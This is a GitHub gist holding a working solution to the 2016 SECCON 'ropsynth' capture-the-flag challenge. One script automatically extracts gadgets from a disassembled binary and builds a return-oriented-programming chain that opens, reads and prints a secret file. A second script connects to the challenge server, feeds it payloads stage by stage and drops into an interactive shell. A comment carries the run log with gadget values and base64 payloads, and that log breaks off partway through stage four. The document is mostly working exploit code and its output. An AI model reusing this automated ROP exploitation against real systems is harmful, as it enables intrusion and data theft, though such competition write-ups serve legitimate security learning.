Skip to content

Instantly share code, notes, and snippets.

@otms61

otms61/r.py

Created December 11, 2016 01:30
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save otms61/1c8254af1466d8af146cabe00e03670a to your computer and use it in GitHub Desktop.
Save otms61/1c8254af1466d8af146cabe00e03670a to your computer and use it in GitHub Desktop.
Download ZIP
Raw
r.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct
import binascii
def p(a):
return struct.pack("<Q", a)
def u(a):
return struct.unpack("<Q", a)[0]
def calc_gadgets(line_itr):
gadgets = []
while True:
g1_line = line_itr.next()
g1_line = g1_line.split()
if g1_line[1] == 'hlt':
continue
if g1_line[1] == 'ret':
print '[*] ret is found!'
break
target = g1_line[2]
inst_list = []
# print '[*] {} is target!'.format(target)
for g_line in line_itr:
if 'je' in g_line:
# print inst_list
break
insts = g_line.split()
v = int(insts[2].split(',')[1], 0x10)
inst_list.append([insts[1], v])
inst = inst_list.pop()
assert(inst[0] == 'cmp')
gadget_val = inst[1]
while len(inst_list) > 0:
inst = inst_list.pop()
if inst[0] == 'sub':
gadget_val += inst[1]
elif inst[0] == 'add':
gadget_val -= inst[1]
elif inst[0] == 'xor':
gadget_val ^= inst[1]
else:
assert(False)
gadget_val &= 0xffffffffffffffff
print " gadget value is {:#x}".format(gadget_val)
gadgets.append(gadget_val)
return gadgets
fp = open('dumped').read().split('\n')
gadgets = {}
line_itr = iter(fp[7:-1])
SECRET_STR_ADDR = 0x00a00000
BUFF_ADDR = 0x00a00100
for line in line_itr:
line = line.split(':')
line_n = int(line[0].strip(), 0x10) + 0x00800000
inst_raw = line[1].strip()
if 'rsi' in inst_raw:
print '[+] rsi gadgets found!'
gn = 'rsi'
elif 'rdi' in inst_raw:
print '[+] rdi gadgets found!'
gn = 'rdi'
elif 'rdx' in inst_raw:
print '[+] rdx gadgets found!'
gn = 'rdx'
elif 'syscall' in inst_raw:
print '[+] syscall gadgets found!'
gn = 'syscall'
elif 'rax' in inst_raw:
if 'push' in inst_raw:
continue
print '[+] rax gadgets found!'
gn = 'rax'
else:
continue
g = calc_gadgets(line_itr)
print g
gadgets[gn] = {'addr': line_n, 'gadgets': g}
def build_rop_gadget(target_ins, val=0, pop_eax=False):
addr = gadgets[target_ins]['addr']
rop_gadgets = []
if target_ins == 'syscall':
rop_gadgets.append(addr)
print '{:>8}: {:8x}'.format(target_ins, addr)
else:
if pop_eax:
rop_gadgets.append(addr-1)
print '{:>8}: {:8x}'.format(target_ins, addr-1)
else:
rop_gadgets.append(addr)
rop_gadgets.append(val)
print '{:>8}: {:8x}'.format(target_ins, addr)
print '{:>8}: {:8x}'.format('val', val)
for v in gadgets[target_ins]['gadgets']:
rop_gadgets.append(v)
print '{:>8}: {:8x}'.format('', v)
# print rop_gadgets
return ''.join(map(p, rop_gadgets))
payload = ''
# fd = open('secret', 0, 0)
payload += build_rop_gadget('rax', 2)
payload += build_rop_gadget('rdi', SECRET_STR_ADDR)
payload += build_rop_gadget('rsi', 0)
payload += build_rop_gadget('rdx', 0)
payload += build_rop_gadget('syscall')
# len = read(fd, buf, 256)
payload += build_rop_gadget('rdi', pop_eax=True)
payload += build_rop_gadget('rax', 0)
payload += build_rop_gadget('rsi', BUFF_ADDR)
payload += build_rop_gadget('rdx', 256)
payload += build_rop_gadget('syscall')
# write(1, buf, len)
payload += build_rop_gadget('rdx', pop_eax=True)
payload += build_rop_gadget('rax', 1)
payload += build_rop_gadget('rdi', 1)
payload += build_rop_gadget('rsi', BUFF_ADDR)
payload += build_rop_gadget('syscall')
# print payload.encode('base64')
b_payload = binascii.b2a_base64(payload)
print b_payload
ofp = open('payload', 'w')
ofp.write(b_payload)
ofp.close()
Raw
x.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
import os
def sock(remoteip, remoteport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((remoteip, remoteport))
f = s.makefile('rw', bufsize=0)
return s, f
def read_until(f, delim='\n'):
data = ''
while not data.endswith(delim):
data += f.read(1)
return data
def shell(s):
t = telnetlib.Telnet()
t.sock = s
t.interact()
# s, f = sock('localhost', 4444)
s, f = sock('ropsynth.pwn.seccon.jp', 10000)
print read_until(f)
def attack():
encoded = read_until(f)
print 'encoded'
print encoded
fp = open('bin', 'w')
fp.write(encoded.decode('base64'))
fp.close()
os.system('objdump --no-show-raw-insn -Mintel,x86-64 -b binary -D -m i386 ./bin > dumped')
os.system('python r.py')
fg = open('payload').read()
f.write(fg)
attack()
for _ in range(4):
print read_until(f, 'stage')
print read_until(f)
attack()
shell(s)
@otms61
Copy link
Author

otms61 commented Dec 11, 2016
edited 

$ python x.py
stage 1/5
stage 1/5

encoded
9PT09FBaWUiB8csfwExIgcG0dcNWSIHBLJkJFEiB6ZDMjGBIgcHmOGUGSIHBnyVoUkiB6QWr3k5IgfnWISUNdAL09EFfSYHvqv3xC0mB91FikSJJge/HwM5iSYHvD2xYa0mB78vFgQlJgf/e24ZGdAL09EFbSYHzvUOMH0mB80DGkgJJgcMzkVlZSYHrV5Q3EkmB62G7CwVJgftzrgBLdAP09PRBXEmB7C2VsFNJgewyBRYDSYHsYNMrJkmBxCGqAgVJgfQ0GPs+SYH0h80UY0mBxGZzpgRJgcRbaUosSYH89RrmRHQH9PT09PT09FtIgfNIl2VLSIHrF4jiS0iB852X80hIgcN+xN4kSIHzwNjbFEiB+9xXgXR0BfT09PT0WUiB6diYbCRIgfFVsQ4zSIHpJ+GAVUiBweKjWjxIgfFx81kbSIHBoQZBHEiB+SvaeSB0B/T09PT09PTD9PT09PT09PQPBVtIgfODB6EjSIH7MmLTIXQG9PT09PT0QVxJgey5hggSSYHEPlJaL0mB9AL9yTRJgewornt0SYHEgLmUX0mB7CaG4lJJgfyQZRpQdAX09PT09EFeSYHuWWtsR0mB9msfWjdJgf6CiGZXdAn09PT09PT09PTD9PT09PT09FhbSIHzQ3uSaEiB87PTejRIgetVJLxmSIHrWsUcQEiB6zvnCjBIgetvg686SIH7h5eLRHQJ9PT09PT09PT0w/T0XkFeSYHGp0c0HEmB7nTGhDlJge7iaIUFSYH2h3hCE0mBxku8vQRJgf5tEYYcdAn09PT09PT09PRZSIHxAcgEPkiB8R4ag3dIgfEu3VJjSIHx5NBQLkiB6atUAlZIgflod5cqdAT09PT0W0iB8xvVrzlIgevKP18+SIHzF5qcW0iB8/6rOh1IgcMbp9c5SIH7sXxHfXQI9PT09PT09PRBW0mB84Ms/y9JgcObnUJ5SYHzGqJzIkmB87dMBgFJgeu1z1ksSYHDaSJOJEmB60RWfnFJgfvwR/AydAP09PRbSIHzGWDbckiB88eWfDZIgfP7Fh1VSIH7GmFWUnQJ9PT09PT09PT0XUiB7WyLfUFIgf1KbElzdAP09PRBX0mB7/TqQidJgffT3yJXSYHvMyHZf0mB/wltaEJ0CPT09PT09PT0w/T0UF9BXkmBxvIZCj5JgfbMrWtCSYHuKY2XQkmBxtdk3iJJgf4ARJJWdAT09PT0QV1JgfWRk6xtSYHtfPNkP0mBxR3jqTlJgcUcedElSYH1VomsMEmB7aw2+zRJgf2Z1V1VdAP09PTD

[+] rdx gadgets found!
  gadget value is 0xffffffffb43633cd
  gadget value is 0x148b0a9d8
  gadget value is 0x15f4e905
  gadget value is 0xc60aaf25
  gadget value is 0xf40f7252
  gadget value is 0x2ff687ed
[*] ret is found!
[+] syscall gadgets found!
  gadget value is 0x27265b1
  gadget value is 0x65d851d7
  gadget value is 0xa7a90342
[*] ret is found!
[+] rax gadgets found!
  gadget value is 0x10af64310
[*] ret is found!
[+] rsi gadgets found!
  gadget value is 0x27601554
  gadget value is 0x841c13c6
  gadget value is 0x7d86f152
  gadget value is 0x3a322b11
  gadget value is 0x43ec813f
  gadget value is 0xb4c6f7b6
  gadget value is 0xbca63ce3
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0xfffffffff616a7ac
  gadget value is 0xf7738fc7
[*] ret is found!
     rax:           8001e1
     val:                2
        :        10af64310
     rdi:           800367
     val:           a00000
        : fffffffff616a7ac
        :         f7738fc7
     rsi:           800222
     val:                0
        :         27601554
        :         841c13c6
        :         7d86f152
        :         3a322b11
        :         43ec813f
        :         b4c6f7b6
        :         bca63ce3
     rdx:           800005
     val:                0
        : ffffffffb43633cd
        :        148b0a9d8
        :         15f4e905
        :         c60aaf25
        :         f40f7252
        :         2ff687ed
 syscall:           800164
        :          27265b1
        :         65d851d7
        :         a7a90342
     rdi:           800366
        : fffffffff616a7ac
        :         f7738fc7
     rax:           8001e1
     val:                0
        :        10af64310
     rsi:           800222
     val:           a00100
        :         27601554
        :         841c13c6
        :         7d86f152
        :         3a322b11
        :         43ec813f
        :         b4c6f7b6
        :         bca63ce3
     rdx:           800005
     val:              100
        : ffffffffb43633cd
        :        148b0a9d8
        :         15f4e905
        :         c60aaf25
        :         f40f7252
        :         2ff687ed
 syscall:           800164
        :          27265b1
        :         65d851d7
        :         a7a90342
     rdx:           800004
        : ffffffffb43633cd
        :        148b0a9d8
        :         15f4e905
        :         c60aaf25
        :         f40f7252
        :         2ff687ed
     rax:           8001e1
     val:                1
        :        10af64310
     rdi:           800367
     val:                1
        : fffffffff616a7ac
        :         f7738fc7
     rsi:           800222
     val:           a00100
        :         27601554
        :         841c13c6
        :         7d86f152
        :         3a322b11
        :         43ec813f
        :         b4c6f7b6
        :         bca63ce3
 syscall:           800164
        :          27265b1
        :         65d851d7
        :         a7a90342
4QGAAAAAAAACAAAAAAAAABBD9goBAAAAZwOAAAAAAAAAAKAAAAAAAKynFvb/////x49z9wAAAAAiAoAAAAAAAAAAAAAAAAAAVBVgJwAAAADGExyEAAAAAFLxhn0AAAAAESsyOgAAAAA/gexDAAAAALb3xrQAAAAA4zymvAAAAAAFAIAAAAAAAAAAAAAAAAAAzTM2tP/////YqbBIAQAAAAXp9BUAAAAAJa8KxgAAAABScg/0AAAAAO2H9i8AAAAAZAGAAAAAAACxZXICAAAAANdR2GUAAAAAQgOppwAAAABmA4AAAAAAAKynFvb/////x49z9wAAAADhAYAAAAAAAAAAAAAAAAAAEEP2CgEAAAAiAoAAAAAAAAABoAAAAAAAVBVgJwAAAADGExyEAAAAAFLxhn0AAAAAESsyOgAAAAA/gexDAAAAALb3xrQAAAAA4zymvAAAAAAFAIAAAAAAAAABAAAAAAAAzTM2tP/////YqbBIAQAAAAXp9BUAAAAAJa8KxgAAAABScg/0AAAAAO2H9i8AAAAAZAGAAAAAAACxZXICAAAAANdR2GUAAAAAQgOppwAAAAAEAIAAAAAAAM0zNrT/////2KmwSAEAAAAF6fQVAAAAACWvCsYAAAAAUnIP9AAAAADth/YvAAAAAOEBgAAAAAAAAQAAAAAAAAAQQ/YKAQAAAGcDgAAAAAAAAQAAAAAAAACspxb2/////8ePc/cAAAAAIgKAAAAAAAAAAaAAAAAAAFQVYCcAAAAAxhMchAAAAABS8YZ9AAAAABErMjoAAAAAP4HsQwAAAAC298a0AAAAAOM8prwAAAAAZAGAAAAAAACxZXICAAAAANdR2GUAAAAAQgOppwAAAAA=

OK
stage
 2/5

encoded
9PT09PT09PRYQVtJgcNp2Fc4SYHzo/haZEmB+y5GBxh0B/T09PT09PRBW0mB63qFBlFJgcNRXwlqSYHruQ9VAEmB64/TNRdJgcMm7Qs1SYHrJLmYH0mB6+RuNjZJgevCjPVTSYH7elK4MHQE9PT09FtIgfNNa6UPSIHze87FUEiB8ydcYWlIgcM3LQoKSIH7nmw5ZHQJ9PT09PT09PT0QV9Jgfd+F60/SYHvf9waTUmB95TLOTtJgfd2TFAjSYHH+8wBVkmB/+1h2Ux0A/T09MP0DwVbSIHzT1OMeEiBw7EYtEtIgfPa58h/SIHr1d+NBUiB+7l4oBB0AvT0W0iB6zLT6U9IgetNb4YlSIHrVdpJJ0iB+9gDsRN0B/T09PT09PRZSIHpf72UF0iBwfE60mpIgfl9WF4FdAj09PT09PT09EFfSYHHjaT2OkmBx8uvOnxJgcdHnqs9SYH3xn2OQEmBx4LotW5Jgccb/LYmSYH3iNDGQkmB/8V6h050BfT09PT0W0iB8394YT5IgcPB5r4bSIHzunz5OUiBwxz/iXZIgcNfZDgPSIHDlA+ORkiB8xrcjE5IgfsX0XA/dAX09PT09EFfSYH3hJCzKEmBx7oXXklJgfc1g7MJSYHHCq2gFkmBx/pBxBFJgfeOCCsHSYH3rZCAQkmBx0JA9UZJgf8yQEMKdAb09PT09PTD9PT09FBfQV9JgceE6rRDSYH3cm5JEkmBx5gJgmtJgfeEb/8cSYH3EktPakmB78x5GwFJgccT3soPSYH3Z6rtHEmB/3aG50x0AvT0w/T0UFpbSIHD0lhVR0iBw3+ouklIgesI1GgaSIHzp90IBkiB+2I2JFB0BPT09PRBXkmB9t2Q1GxJge4wRvlJSYH+UpyjO3QG9PT09PT0XUiB9daIznxIgcWGf3oGSIH9pvMrU3QC9PRBXEmB7AHSF0pJgfSsD3IxSYH0lKH9U0mBxOLNylBJgfwpO1oldAX09PT09MP09PT09F5BXkmB7rVKg2lJge7j5xI8SYH2v481TkmBxvZAEGJJgf504zQFdAT09PT0ww==

[+] rax gadgets found!
  gadget value is 0x4405e624
  gadget value is 0xa3f9238f
  gadget value is 0x6c2ec676
  gadget value is 0x475f8f1
[*] ret is found!
[+] syscall gadgets found!
  gadget value is 0x66bef5ec
  gadget value is 0xb06b20ac
  gadget value is 0xffffffffb220db0b
  gadget value is 0xfffffffe417dc5d7
  gadget value is 0xffffffffbef286fc
  gadget value is 0xffffffff256774c4
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0xffffffff9a6ccd32
[*] ret is found!
[+] rdx gadgets found!
  gadget value is 0xffffffffdf85be7c
  gadget value is 0xe948725f
  gadget value is 0x307ffcf6
  gadget value is 0x189580
[*] ret is found!
[+] rsi gadgets found!
  gadget value is 0x92a76059
[*] ret is found!
     rax:           800008
     val:                2
        :         4405e624
        :         a3f9238f
        :         6c2ec676
        :          475f8f1
     rdi:           800212
     val:           a00000
        : ffffffff9a6ccd32
     rsi:           8002f2
     val:                0
        :         92a76059
     rdx:           80025c
     val:                0
        : ffffffffdf85be7c
        :         e948725f
        :         307ffcf6
        :           189580
 syscall:           8000d2
        :         66bef5ec
        :         b06b20ac
        : ffffffffb220db0b
        : fffffffe417dc5d7
        : ffffffffbef286fc
        : ffffffff256774c4
     rdi:           800211
        : ffffffff9a6ccd32
     rax:           800008
     val:                0
        :         4405e624
        :         a3f9238f
        :         6c2ec676
        :          475f8f1
     rsi:           8002f2
     val:           a00100
        :         92a76059
     rdx:           80025c
     val:              100
        : ffffffffdf85be7c
        :         e948725f
        :         307ffcf6
        :           189580
 syscall:           8000d2
        :         66bef5ec
        :         b06b20ac
        : ffffffffb220db0b
        : fffffffe417dc5d7
        : ffffffffbef286fc
        : ffffffff256774c4
     rdx:           80025b
        : ffffffffdf85be7c
        :         e948725f
        :         307ffcf6
        :           189580
     rax:           800008
     val:                1
        :         4405e624
        :         a3f9238f
        :         6c2ec676
        :          475f8f1
     rdi:           800212
     val:                1
        : ffffffff9a6ccd32
     rsi:           8002f2
     val:           a00100
        :         92a76059
 syscall:           8000d2
        :         66bef5ec
        :         b06b20ac
        : ffffffffb220db0b
        : fffffffe417dc5d7
        : ffffffffbef286fc
        : ffffffff256774c4
CACAAAAAAAACAAAAAAAAACTmBUQAAAAAjyP5owAAAAB2xi5sAAAAAPH4dQQAAAAAEgKAAAAAAAAAAKAAAAAAADLNbJr/////8gKAAAAAAAAAAAAAAAAAAFlgp5IAAAAAXAKAAAAAAAAAAAAAAAAAAHy+hd//////X3JI6QAAAAD2/H8wAAAAAICVGAAAAAAA0gCAAAAAAADs9b5mAAAAAKwga7AAAAAAC9sgsv/////XxX1B/v////yG8r7/////xHRnJf////8RAoAAAAAAADLNbJr/////CACAAAAAAAAAAAAAAAAAACTmBUQAAAAAjyP5owAAAAB2xi5sAAAAAPH4dQQAAAAA8gKAAAAAAAAAAaAAAAAAAFlgp5IAAAAAXAKAAAAAAAAAAQAAAAAAAHy+hd//////X3JI6QAAAAD2/H8wAAAAAICVGAAAAAAA0gCAAAAAAADs9b5mAAAAAKwga7AAAAAAC9sgsv/////XxX1B/v////yG8r7/////xHRnJf////9bAoAAAAAAAHy+hd//////X3JI6QAAAAD2/H8wAAAAAICVGAAAAAAACACAAAAAAAABAAAAAAAAACTmBUQAAAAAjyP5owAAAAB2xi5sAAAAAPH4dQQAAAAAEgKAAAAAAAABAAAAAAAAADLNbJr/////8gKAAAAAAAAAAaAAAAAAAFlgp5IAAAAA0gCAAAAAAADs9b5mAAAAAKwga7AAAAAAC9sgsv/////XxX1B/v////yG8r7/////xHRnJf////8=

OK
stage
 3/5

encoded
9PT09PReQVtJgfM9oXowSYHztuCXRUmBw2wvcydJgevuc2xtSYH70vSPDXQH9PT09PT09EFeSYH2qbqxaEmBxuVP3VZJgcZ01WxMSYH2VJWwT0mB9mMyQmdJge5jTnkzSYH+OS9zFHQC9PRBW0mB8/xC8GJJgcPmUUZSSYH7TKPHRnQE9PT09EFfSYH3lGirMkmB76ry1ElJge9ultw2SYH3I6teJkmBx7+1NHRJgf8gA1ktdAj09PT09PT09EFcSYHsKaJEfkmBxNMdrwRJgfSmBL9HSYHE5APhFEmBxKGACitJgfR9pVdqSYH0He8+Z0mB9AXxeR9JgfxQMuRBdAL09EFdSYH1mD1XJ0mB9YgSKhhJgf2HwIdHdAX09PT09F1IgfXOh6csSIH1ViZqV0iB/WHegU50BvT09PT09FlIgelLjvdtSIHB2QjvR0iB8UYP/1JIgfHwGnxBSIHxv+FGN0iB8Zp9ERBIgcHFDwZDSIH5qsX0cXQC9PTD9FBfQV1Jge3c1RZ3SYHt0FZNc0mB7R4jXFZJge0xMB5wSYHtvgQtAkmBxfoDASNJgf19ANVudAj09PT09PT09F1Ige2DpG8BSIHt5xDNGEiBxXbrJ1tIgfU73pZmSIH9/eN4HHQC9PRBXUmB7UTIm0tJge1ZqecvSYH1K+l/MEmBxaTgnQBJgfXfJ/AsSYHFfPJ9D0mB/fIrtSd0A/T09FtIgcPjadI/SIHzkcLzUEiB8wc2WkZIgcN7uEgASIH74pKqE3QE9PT09EFeSYHuOQFKK0mBxjk6+h1JgcZHfaQSSYH+udhOOXQF9PT09PRdSIHF30okIUiB/XWIOWB0BfT09PT0W0iB8yrNZWhIgfNwZi9ESIHzx8XWGEiBww/qMmRIgfMW0KhaSIH7PYrMOHQC9PTD9PQPBUFfSYHvQOXrQ0mB91u7agBJgfebpVE4SYHHoVOMfUmB9yfNHi5JgcdXNfpMSYH/h8ZVFnQF9PT09PRbSIHrsbTiCkiB86GkOjtIgfuzdxYLdAb09PT09PRBXkmBxrW1t1NJgf7uV7lSdAn09PT09PT09PRBXEmB9GfU5hVJgex6d+EGSYH08uBhSkmB9LJxellJgfyT/+00dAL09EFbSYHDYwx2CUmB8173uBJJgfM9bFFWSYHD23GGakmB64JvGj1JgcNvXj0SSYHzQV+cfkmB80HnbzpJgfsAKUJZdAn09PT09PT09PRBXEmB9EJexhdJgfRCx2BbSYH0iXbFBkmB7NIgdg5JgfSu3YkmSYH8AwN/GnQF9PT09PRBXkmBxiPs1WdJgcZGPrpJSYHuZsCzLUmB9pbY80tJgcZKwpcASYH+Rr37E3QJ9PT09PT09PT0w/T09PRYQV5Jge4hudRASYHGnM9JKkmB9pbX3SpJgfZnxoMESYHu32ZGCkmB7klmzH9JgcafBPl7SYH+PH2KS3QG9PT09PT0QVxJgfRtXJ1aSYH8AAued3QE9PT09EFdSYH1YQ3sfkmBxQPLnSBJgcUps3BmSYHFgBFND0mB9RuI71NJgf0ifmY8dAL09FtIgcPfoGlSSIHDXPZaHUiB8/fxBWdIgeuyiwo/SIHrgL48OUiBw+ACYQZIgevBIcksSIHzfJAba0iB+xDhHBl0BfT09PT0W0iB69FEs3JIgfNVUhpYSIHrWqeadEiB652QXzxIgfNiBo5GSIHD0vtXEkiBw29cKy1Igft2Fho7dAP09PTD9PT0UFpBXkmB7gpzRXNJgca7l7ctSYHugQ7nPkmB7jRZhGhJgcZ5k9MGSYHuYUbPWkmBxkq+Xk5Jgf5cWpoedAT09PT0ww==

[+] rsi gadgets found!
  gadget value is 0x266478df
  gadget value is 0xffffffffa3650ffb
  gadget value is 0xffffffff9671139a
  gadget value is 0x128707ce
  gadget value is 0xcd4b846c
  gadget value is 0x78faef97
  gadget value is 0x354c7ff9
  gadget value is 0x4042c1e8
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0x1fedf813c
  gadget value is 0x3a0307ba
  gadget value is 0x7fda48cb
  gadget value is 0xffffffffc5f5c50e
  gadget value is 0x33fa2272
  gadget value is 0x3f153d96
  gadget value is 0xffffffffcaad1e81
[*] ret is found!
[+] syscall gadgets found!
  gadget value is 0xffffffff956dfbf6
  gadget value is 0x3b0f87c3
  gadget value is 0xffffffffff01a239
  gadget value is 0x3b31322a
  gadget value is 0xffffffff916b9ef8
  gadget value is 0x10f10f6
  gadget value is 0xffffffffd4b3b867
[*] ret is found!
[+] rax gadgets found!
  gadget value is 0x8e853db9
  gadget value is 0x2d03576d
  gadget value is 0xffffffffa7c26bec
  gadget value is 0x107ee944d
  gadget value is 0xa8bbe6ec
[*] ret is found!
[+] rdx gadgets found!
  gadget value is 0x1113091fe
[*] ret is found!
     rax:           80040d
     val:                2
        :         8e853db9
        :         2d03576d
        : ffffffffa7c26bec
        :        107ee944d
        :         a8bbe6ec
     rdi:           80017f
     val:           a00000
        :        1fedf813c
        :         3a0307ba
        :         7fda48cb
        : ffffffffc5f5c50e
        :         33fa2272
        :         3f153d96
        : ffffffffcaad1e81
     rsi:           800005
     val:                0
        :         266478df
        : ffffffffa3650ffb
        : ffffffff9671139a
        :         128707ce
        :         cd4b846c
        :         78faef97
        :         354c7ff9
        :         4042c1e8
     rdx:           800520
     val:                0
        :        1113091fe
 syscall:           8002b4
        : ffffffff956dfbf6
        :         3b0f87c3
        : ffffffffff01a239
        :         3b31322a
        : ffffffff916b9ef8
        :          10f10f6
        : ffffffffd4b3b867
     rdi:           80017e
        :        1fedf813c
        :         3a0307ba
        :         7fda48cb
        : ffffffffc5f5c50e
        :         33fa2272
        :         3f153d96
        : ffffffffcaad1e81
     rax:           80040d
     val:                0
        :         8e853db9
        :         2d03576d
        : ffffffffa7c26bec
        :        107ee944d
        :         a8bbe6ec
     rsi:           800005
     val:           a00100
        :         266478df
        : ffffffffa3650ffb
        : ffffffff9671139a
        :         128707ce
        :         cd4b846c
        :         78faef97
        :         354c7ff9
        :         4042c1e8
     rdx:           800520
     val:              100
        :        1113091fe
 syscall:           8002b4
        : ffffffff956dfbf6
        :         3b0f87c3
        : ffffffffff01a239
        :         3b31322a
        : ffffffff916b9ef8
        :          10f10f6
        : ffffffffd4b3b867
     rdx:           80051f
        :        1113091fe
     rax:           80040d
     val:                1
        :         8e853db9
        :         2d03576d
        : ffffffffa7c26bec
        :        107ee944d
        :         a8bbe6ec
     rdi:           80017f
     val:                1
        :        1fedf813c
        :         3a0307ba
        :         7fda48cb
        : ffffffffc5f5c50e
        :         33fa2272
        :         3f153d96
        : ffffffffcaad1e81
     rsi:           800005
     val:           a00100
        :         266478df
        : ffffffffa3650ffb
        : ffffffff9671139a
        :         128707ce
        :         cd4b846c
        :         78faef97
        :         354c7ff9
        :         4042c1e8
 syscall:           8002b4
        : ffffffff956dfbf6
        :         3b0f87c3
        : ffffffffff01a239
        :         3b31322a
        : ffffffff916b9ef8
        :          10f10f6
        : ffffffffd4b3b867
DQSAAAAAAAACAAAAAAAAALk9hY4AAAAAbVcDLQAAAADsa8Kn/////02U7gcBAAAA7Oa7qAAAAAB/AYAAAAAAAAAAoAAAAAAAPIHf/gEAAAC6BwM6AAAAAMtI2n8AAAAADsX1xf////9yIvozAAAAAJY9FT8AAAAAgR6tyv////8FAIAAAAAAAAAAAAAAAAAA33hkJgAAAAD7D2Wj/////5oTcZb/////zgeHEgAAAABshEvNAAAAAJfv+ngAAAAA+X9MNQAAAADowUJAAAAAACAFgAAAAAAAAAAAAAAAAAD+kTARAQAAALQCgAAAAAAA9vttlf/////Dhw87AAAAADmiAf//////KjIxOwAAAAD4nmuR//////YQDwEAAAAAZ7iz1P////9+AYAAAAAAADyB3/4BAAAAugcDOgAAAADLSNp/AAAAAA7F9cX/////ciL6MwAAAACWPRU/AAAAAIEercr/////DQSAAAAAAAAAAAAAAAAAALk9hY4AAAAAbVcDLQAAAADsa8Kn/////02U7gcBAAAA7Oa7qAAAAAAFAIAAAAAAAAABoAAAAAAA33hkJgAAAAD7D2Wj/////5oTcZb/////zgeHEgAAAABshEvNAAAAAJfv+ngAAAAA+X9MNQAAAADowUJAAAAAACAFgAAAAAAAAAEAAAAAAAD+kTARAQAAALQCgAAAAAAA9vttlf/////Dhw87AAAAADmiAf//////KjIxOwAAAAD4nmuR//////YQDwEAAAAAZ7iz1P////8fBYAAAAAAAP6RMBEBAAAADQSAAAAAAAABAAAAAAAAALk9hY4AAAAAbVcDLQAAAADsa8Kn/////02U7gcBAAAA7Oa7qAAAAAB/AYAAAAAAAAEAAAAAAAAAPIHf/gEAAAC6BwM6AAAAAMtI2n8AAAAADsX1xf////9yIvozAAAAAJY9FT8AAAAAgR6tyv////8FAIAAAAAAAAABoAAAAAAA33hkJgAAAAD7D2Wj/////5oTcZb/////zgeHEgAAAABshEvNAAAAAJfv+ngAAAAA+X9MNQAAAADowUJAAAAAALQCgAAAAAAA9vttlf/////Dhw87AAAAADmiAf//////KjIxOwAAAAD4nmuR//////YQDwEAAAAAZ7iz1P////8=

OK
stage
 4/5

encoded
9PT09PT0DwVZSIHxP5ByOEiB8anoqk1IgfF7zBVkSIHpMLV3O0iB6RAO9j1IgenBQb8ZSIHpOzDXa0iB+e2KLz10B/T09PT09PRZSIHp1BcgTUiB8ey3qFhIgcGMQbJmSIH5zfFHLnQH9PT09PT09EFcSYHE0KpcLkmBxPfm7CxJgcTt4ecLSYHsDs7vZkmB7ByEkihJgfRQ4CY+SYH0nlBWVEmB/DfBNXh0CPT09PT09PT0XUiB7STgxTpIgfUZzZxaSIH18dDJH0iB7WXZ9gxIgcWrcUFNSIH1seWuMkiB/SZQXkV0CPT09PT09PT0w/T0UF9BXkmB7sSu0ndJgf72idZVdAn09PT09PT09PRdSIHFPgP/XEiB9TKejRZIgcUHGHhGSIHFmgxAVEiB7fePtxdIge0grJdSSIH9pzL0OHQG9PT09PT0QV9Jge9M1/sLSYH/SCJuL3QF9PT09PRBXkmB7lYqg2dJge4xZOJySYHGqZI2a0mB/mQrzjF0CfT09PT09PT09MP09PT09PT0Xl1IgcXZBsgsSIH1dXeyTEiBxQHLUgJIgcVAcyM5SIH9XpuNC3QH9PT09PT09F1Ige2qNU5CSIHF+ON5TkiB9SeVEwtIgcUvmV9NSIHFc9ZPPEiBxWnEsCdIge3irjRNSIH9iAAHanQG9PT09PT0XUiB7dMzWlpIgfXpWeEpSIHtHrpbckiBxTwXfTdIgf2bQQAtdAP09PTD9PT0UFpBXUmB7Tn0ZWVJge2iF2s+SYHFZi/mSkmB7eT6EiBJgcW6lbtQSYHtt3kjIEmB9Yzm5mRJgf1OWp0ydAT09PT0QV5Jge74aa9ZSYHuD2YHREmB7sDd5SBJgfaGG0BASYH+scLwDHQD9PT0WUiB6TKUBCtIgemw5rNgSIHBP7DSKkiB+XdiAnB0CfT09PT09PT09EFbSYHrVf3QdkmB+4cnq090AvT0w/T0WEFeSYHuEFjJSUmB7oB7HktJgcabZhJqSYHulxsLEEmBxtm7WEtJge4h6VAXSYHuvsGVNkmBxtGciFxJgf5aqzx4dAb09PT09PRBXUmB7RHQmURJgcVORNsjSYHFPevtWUmBxeGlckhJgfWkp59fSYHt1f1PN0mBxdSsBk5JgcVjhBRQSYH9FZyOM3QG9PT09PT0ww==

[+] syscall gadgets found!
  gadget value is 0x12dfe74c4
  gadget value is 0xffffffffec5d1f81
  gadget value is 0x3a96506f
  gadget value is 0xadb8e0dd
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0xcda938ba
  gadget value is 0xffffffffc107d0f1
  gadget value is 0x3b69f994
  gadget value is 0xa0fd2742
[*] ret is found!
[+] rsi gadgets found!
  gadget value is 0xffffffff6fdd238f
  gadget value is 0x29d402a
  gadget value is 0xa899f167
[*] ret is found!
[+] rdx gadgets found!
  gadget value is 0x9ee17818
  gadget value is 0x10b4d86fe
  gadget value is 0xd0e82d1a
  gadget value is 0xc67c24dc
[*] ret is found!
[+] rax gadgets found!
  gadget value is 0x5922861b
  gadget value is 0xffffffff11bac9bc
[*] ret is found!
     rax:           8002d9
     val:                2
        :         5922861b
        : ffffffff11bac9bc
     rdi:           8000f4
     val:           a00000
        :         cda938ba
        : ffffffffc107d0f1
        :         3b69f994
        :         a0fd2742
     rsi:           800192
     val:                0
        : ffffffff6fdd238f
        :          29d402a
        :         a899f167
     rdx:           80022f
     val:                0
        :         9ee17818
        :        10b4d86fe
        :         d0e82d1a
        :         c67c24dc
 syscall:           800006
        :        12dfe74c4
        : ffffffffec5d1f81
        :         3a96506f
        :         adb8e0dd
     rdi:           8000f3
        :         cda938ba
        : ffffffffc107d0f1
        :         3b69f994
        :         a0fd2742
     rax:           8002d9
     val:                0
        :         5922861b
        : ffffffff11bac9bc
     rsi:           800192
     val:           a00100
        : ffffffff6fdd238f
        :          29d402a
        :         a899f167
     rdx:           80022f
     val:              100
        :         9ee17818
        :        10b4d86fe
        :         d0e82d1a
        :         c67c24dc
 syscall:           800006
        :        12dfe74c4
        : ffffffffec5d1f81
        :         3a96506f
        :         adb8e0dd
     rdx:           80022e
        :         9ee17818
        :        10b4d86fe
        :         d0e82d1a
        :         c67c24dc
     rax:           8002d9
